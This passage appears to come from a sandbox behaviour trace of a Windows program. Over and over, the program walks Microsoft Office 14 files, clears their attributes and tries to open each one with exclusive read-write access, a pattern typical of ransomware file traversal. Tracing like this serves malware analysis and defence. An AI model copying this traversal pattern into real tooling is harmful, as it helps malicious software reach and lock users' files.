(normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.507] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.507] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.507] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.507] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.508] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.508] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.508] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.508] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.508] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.508] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.508] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL", dwFileAttributes=0x80) returned 0 [0136.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SHAPNUM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\shapnum.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.509] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.509] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.509] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SKY.CSS", dwFileAttributes=0x80) returned 0 [0136.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SKY.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sky.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.510] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.510] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.510] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.510] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.510] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL", dwFileAttributes=0x80) returned 0 [0136.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\smigrate.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.511] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.511] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.512] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.512] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.515] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD", dwFileAttributes=0x80) returned 0 [0136.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\space.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.516] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.516] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.516] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPRING.CSS", dwFileAttributes=0x80) returned 0 [0136.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPRING.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\spring.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.517] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.517] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.517] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.517] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPS.CSS", dwFileAttributes=0x80) returned 0 [0136.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPS.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sps.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.517] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.517] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.518] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STEEL.CSS", dwFileAttributes=0x80) returned 0 [0136.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STEEL.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\steel.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.518] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.519] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.519] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.519] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLIST.CHM", dwFileAttributes=0x80) returned 0 [0136.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLIST.CHM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\stslist.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.519] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.519] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.519] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.519] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SUNNY.CSS", dwFileAttributes=0x80) returned 0 [0136.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SUNNY.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sunny.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.520] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.520] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.520] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SUNSET.CSS", dwFileAttributes=0x80) returned 0 [0136.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SUNSET.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sunset.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.520] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.521] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.521] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.521] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TERRCOTT.CSS", dwFileAttributes=0x80) returned 0 [0136.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TERRCOTT.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\terrcott.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.522] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.522] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.522] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL", dwFileAttributes=0x80) returned 0 [0136.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\timesoln.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.523] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.523] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.523] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.523] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL", dwFileAttributes=0x80) returned 0 [0136.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\uml.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.524] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.524] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.524] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.524] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.524] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD", dwFileAttributes=0x80) returned 0 [0136.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\valve.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.525] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.525] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.525] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.525] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.525] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.525] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL", dwFileAttributes=0x80) returned 0 [0136.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\viscolor.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.526] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.526] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.526] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.526] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.526] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.526] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.CSS", dwFileAttributes=0x80) returned 0 [0136.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.527] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.527] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.527] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.527] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS", dwFileAttributes=0x80) returned 0 [0136.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.528] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.528] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.528] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.528] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.528] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.528] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.529] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.529] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.529] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.529] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.529] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.529] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.529] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.530] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.530] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.530] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.530] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.531] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.531] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.531] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS", dwFileAttributes=0x80) returned 0 [0136.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.531] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.531] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.531] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.531] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS", dwFileAttributes=0x80) returned 0 [0136.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.532] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.532] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.532] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.532] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.532] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.532] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.532] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.532] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.532] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.533] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.533] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.533] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.533] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.533] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.533] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.534] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK" (normalized: 